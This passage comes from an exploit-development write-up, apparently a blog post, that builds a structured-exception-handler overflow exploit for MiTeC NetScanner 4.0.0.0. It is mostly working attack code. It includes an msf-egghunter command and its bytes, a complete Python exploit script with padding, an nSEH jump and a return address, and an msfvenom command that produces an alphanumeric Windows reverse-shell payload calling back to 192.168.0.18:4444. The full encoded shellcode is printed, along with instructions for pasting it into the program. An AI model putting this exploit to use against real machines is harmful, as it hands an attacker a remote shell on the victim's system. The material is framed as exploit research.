With 61 bytes, we have some room to work. The first thing that comes to mind
is the use of an egghunter. Let’s do that.
We first must create the egghunter. I will use the egg osce
this time:
$ msf-egghunter -e osce -f python -v EGGHUNTER
EGGHUNTER = b""
EGGHUNTER += b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd"
EGGHUNTER += b"\x2e\x3c\x05\x5a\x74\xef\xb8\x6f\x73\x63\x65"
EGGHUNTER += b"\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
Update our exploit with that:
#!/usr/bin/env python3
"""
NetScanner 4.0.0.0 exploit.
Vulnerable Software: NetScanner
Vendor: MiTeC
Version: 4.0.0.0
Exploit Author: Andres Roldan
Tested On: Windows Vista Business 32 bits
Writeup: https://fluidattacks.com/blog/netscan-exploit/
"""
EGGHUNTER = b""
EGGHUNTER += b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd"
EGGHUNTER += b"\x2e\x3c\x05\x5a\x74\xef\xb8\x6f\x73\x63\x65"
EGGHUNTER += b"\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
PAYLOAD = (
# Initial padding
b'A' * 8 +
EGGHUNTER +
b'A' * (76 - 8 - len(EGGHUNTER)) +
# nSEH
b'\xeb\xb4\x41\x41' +
# 00407119 |. 59 POP ECX
# 0040711A |. 5D POP EBP
# 0040711B \. C2 0400 RETN 4
b'\x19\x71\x40'
)
with open('exploit.txt', 'wb') as fd:
fd.write(PAYLOAD)
Great. The egghunter is now ready, but there is nothing to hunt.
We must create a shellcode, place it anywhere on memory
and prepend it with our osceosce
egg. But where?
After some analysis of NetScanner
, I discovered a functionality called
Remote Execute…
on where several parameters are needed, but there is one
called Command line
that accepts long alphanumeric strings. To our favor,
when we type something, it stays on memory:
Let’s check if we can use that field to insert our shellcode. First, we
must create an alphanumeric shellcode:
$ msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=192.168.0.18 LPORT=4444 EXITFUNC=none -f raw -e x86/alpha_mixed BufferRegister=EDI
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_mixed
x86/alpha_mixed succeeded with size 702 (iteration=0)
x86/alpha_mixed chosen with final size 702
Payload size: 702 bytes
WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylyxmREPuPc0CPoyYutqkpPdlKrptpnk1B6lLK1BFtNkCBdhVonWaZTfVQkOLlWLcQ1lS2VLUpzajovmwqKwIr8rrr1GnkBrTPLKRjgLLKrlR1ahHcCxS18QsankPY5p5QXSNkpIUHIsGJBiLKFTlKwqiFFQkOLlJaxO4MeQO708ip2UyfVccMxxGKcMUtt5ytqHNkv8a4318SSVnk6lpKlKBxgl7q8SlK4DLK7qJpMYG4UtEtSkskQqv92z0QyoipaOSocjlKVrXknmCmCXUcfRS0EPaxD7PsTrSoaD0hpLRW5vVgYozulxNp5QeP7p6IiTrtbpsXWYmP0k5PkOiEV0BpRpv0g00P3p0PsXZJ6oKoYpkOjuogPjeUe8o0y8eP7b0huRGpga1LMYM60jvprv3gaxLYy5SD1qKOHUk5iPd4TLKOrnFhrUHlBHjPMenBV6kOxUaxsS2McT7poyis0Wsgv7eakFrJWbSiRvyrImU6kwW4fD7LWqc1lMctddvpjfgppDqDpPrvPV1FaV2vRn66aFpSpVaxT9ZlUoMV9oXUlIypPNBvSvIotpqx5XMW5MCPyoYEmklj8E9raMCXlfnummomyoYEelEVQl7zMPykIpRUveoK3wGcT2RO0j30BskOxUAA
Notice that I used the BufferRegister=EDI
parameter because EDI
is
the register on where our egghunter will point the start of the shellcode.
Let’s update our exploit with that:
#!/usr/bin/env python3
"""
NetScanner 4.0.0.0 exploit.
Vulnerable Software: NetScanner
Vendor: MiTeC
Version: 4.0.0.0
Exploit Author: Andres Roldan
Tested On: Windows Vista Business 32 bits
Writeup: https://fluidattacks.com/blog/netscan-exploit/
"""
EGGHUNTER = b""
EGGHUNTER += b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd"
EGGHUNTER += b"\x2e\x3c\x05\x5a\x74\xef\xb8\x6f\x73\x63\x65"
EGGHUNTER += b"\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
SHELL = (
b'WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIyl'
b'yxmREPuPc0CPoyYutqkpPdlKrptpnk1B6lLK1BFtNkCBdhVonWaZTf'
b'VQkOLlWLcQ1lS2VLUpzajovmwqKwIr8rrr1GnkBrTPLKRjgLLKrlR1'
b'ahHcCxS18QsankPY5p5QXSNkpIUHIsGJBiLKFTlKwqiFFQkOLlJaxO'
b'4MeQO708ip2UyfVccMxxGKcMUtt5ytqHNkv8a4318SSVnk6lpKlKBx'
b'gl7q8SlK4DLK7qJpMYG4UtEtSkskQqv92z0QyoipaOSocjlKVrXknm'
b'CmCXUcfRS0EPaxD7PsTrSoaD0hpLRW5vVgYozulxNp5QeP7p6IiTrt'
b'bpsXWYmP0k5PkOiEV0BpRpv0g00P3p0PsXZJ6oKoYpkOjuogPjeUe8'
b'o0y8eP7b0huRGpga1LMYM60jvprv3gaxLYy5SD1qKOHUk5iPd4TLKO'
b'rnFhrUHlBHjPMenBV6kOxUaxsS2McT7poyis0Wsgv7eakFrJWbSiRv'
b'yrImU6kwW4fD7LWqc1lMctddvpjfgppDqDpPrvPV1FaV2vRn66aFpS'
b'pVaxT9ZlUoMV9oXUlIypPNBvSvIotpqx5XMW5MCPyoYEmklj8E9raM'
b'CXlfnummomyoYEelEVQl7zMPykIpRUveoK3wGcT2RO0j30BskOxUAA'
)
PAYLOAD = (
# Initial padding
b'A' * 8 +
EGGHUNTER +
b'A' * (76 - 8 - len(EGGHUNTER)) +
# nSEH
b'\xeb\xb4\x41\x41' +
# 00407119 |. 59 POP ECX
# 0040711A |. 5D POP EBP
# 0040711B \. C2 0400 RETN 4
b'\x19\x71\x40'
)
print('[*] Please, paste the following text on:')
print('[*] TOOLS -> Remote Execute... -> Command line')
print('')
print(f'osceosce{SHELL.decode()}')
print('')
print('[*] Now paste the exploit payload.')
with open('exploit.txt', 'wb') as fd:
fd.write(PAYLOAD)
Note that I included some instructions. Also, I included osceosce
at the
start of the shellcode. Let’s check it:
We were able to overcome all the original exploit problems.
You can download the final exploit here.